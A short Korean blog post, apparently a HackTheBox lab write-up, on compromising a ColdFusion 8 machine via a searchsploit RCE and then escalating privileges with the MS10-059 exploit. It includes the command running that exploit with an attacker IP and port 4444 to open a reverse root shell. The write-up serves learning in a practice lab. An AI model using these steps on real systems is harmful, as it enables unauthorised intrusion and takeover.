nmap
나는 rpc갖고 삽질했다. rpcclient, rpcinfo.. 등등 명령어를 실행했지만 아무것도 connect되지 않았고 별 다른게 나오지 않았다.
롸업을 보니 fmtp에 주목했다;;; 그리고 10.10.10.11:8500에 접속했다.
접속하는데 30초 정도 걸린다고 한다. 이게 접속이 언제 되는지 알고 기다릴까
/CFIDE/administrator
페이지 하나 넘어갈 때마다 30초 걸린다 말이 되냐
default password 나오지도 않는다.
searchsploit coldfusion 8
버전 8 RCE로 하니까 바로 익스됐다. user.txt도 바로 확인할 수 있었다.
권한상승
windows exploit suggester
권한 관련, metasploit 아닌 것 걸러서 해보면 된다.
MS10-059가 적당하다.
MS10-059.exe 타겟 머신으로 옮겨서 MS10-059.exe 10.10.14.8 4444하고 로컬에서 4444 리스닝하고 있으면 루트쉘이 따진다. bastard와 같은 풀이 방식이다.
이 exe 실행방법은 일단 타겟 머신으로 옮겨와서 그냥 실행해보면 인자로 ip port 주라고 뜬다. 그렇게 파악했다.
롸업에서는 이것저것 어디 접속하고 비밀번호 따고 그런 일을 했던데 나는 필요가 없었다. 왤까??
'워게임 > hackthebox' 카테고리의 다른 글
| silo 롸업 정리(tns listener) (0) | 2021.10.06 |
|---|---|
| grandpa 롸업 정리- 다시해보기 (0) | 2021.10.05 |
| granny 롸업 정리 (0) | 2021.10.03 |
| bastard 롸업 정리 (0) | 2021.10.01 |
| optimum 롸업 정리 (0) | 2021.09.28 |
댓글